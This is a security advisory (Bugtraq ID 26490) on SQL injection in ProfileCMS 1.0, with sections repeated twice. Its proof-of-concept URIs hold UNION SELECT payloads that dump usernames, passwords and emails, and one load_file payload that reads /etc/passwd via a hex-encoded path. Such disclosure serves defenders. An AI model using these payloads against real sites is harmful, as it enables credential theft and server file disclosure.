ProfileCMS ID Parameter Multiple SQL Injection Vulnerabilities
BID:26490
Info
ProfileCMS ID Parameter Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 26490 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6058 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 19 2007 12:00AM |
| Updated: | Dec 18 2007 08:05PM |
| Credit: | M.Hasran Addahroni is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
ProfileCMS ProfileCMS 1.0 |
| Not Vulnerable: | |
Discussion
ProfileCMS ID Parameter Multiple SQL Injection Vulnerabilities
ProfileCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ProfileCMS 1.0 is vulnerable; prior versions may also be affected.
ProfileCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ProfileCMS 1.0 is vulnerable; prior versions may also be affected.
Exploit / POC
ProfileCMS ID Parameter Multiple SQL Injection Vulnerabilities
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?app=profile-codes&action=codes&id=-1%20union%20select%201,2,concat(id,0x3a,username,0x3a,password,0x3a,email),4,5,6,7,8,9,10%20from%20users/*
http://www.example.com/index.php?app=video-codes&action=videos&id=-1%20union%20select%201,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6%20from%20users/*
http://www.example.com/index.php?app=arcade-games&action=games&id=-1%20union%20select%201,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6%20from%20users/*
http://www.example.com/index.php?app=arcade-games&action=games&id=-1%20union%20select%201,load_file(0x2f6574632f706173737764),3,4,5,6%20from%20users/*
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?app=profile-codes&action=codes&id=-1%20union%20select%201,2,concat(id,0x3a,username,0x3a,password,0x3a,email),4,5,6,7,8,9,10%20from%20users/*
http://www.example.com/index.php?app=video-codes&action=videos&id=-1%20union%20select%201,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6%20from%20users/*
http://www.example.com/index.php?app=arcade-games&action=games&id=-1%20union%20select%201,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6%20from%20users/*
http://www.example.com/index.php?app=arcade-games&action=games&id=-1%20union%20select%201,load_file(0x2f6574632f706173737764),3,4,5,6%20from%20users/*
Solution / Fix
ProfileCMS ID Parameter Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ProfileCMS ID Parameter Multiple SQL Injection Vulnerabilities
References:
References: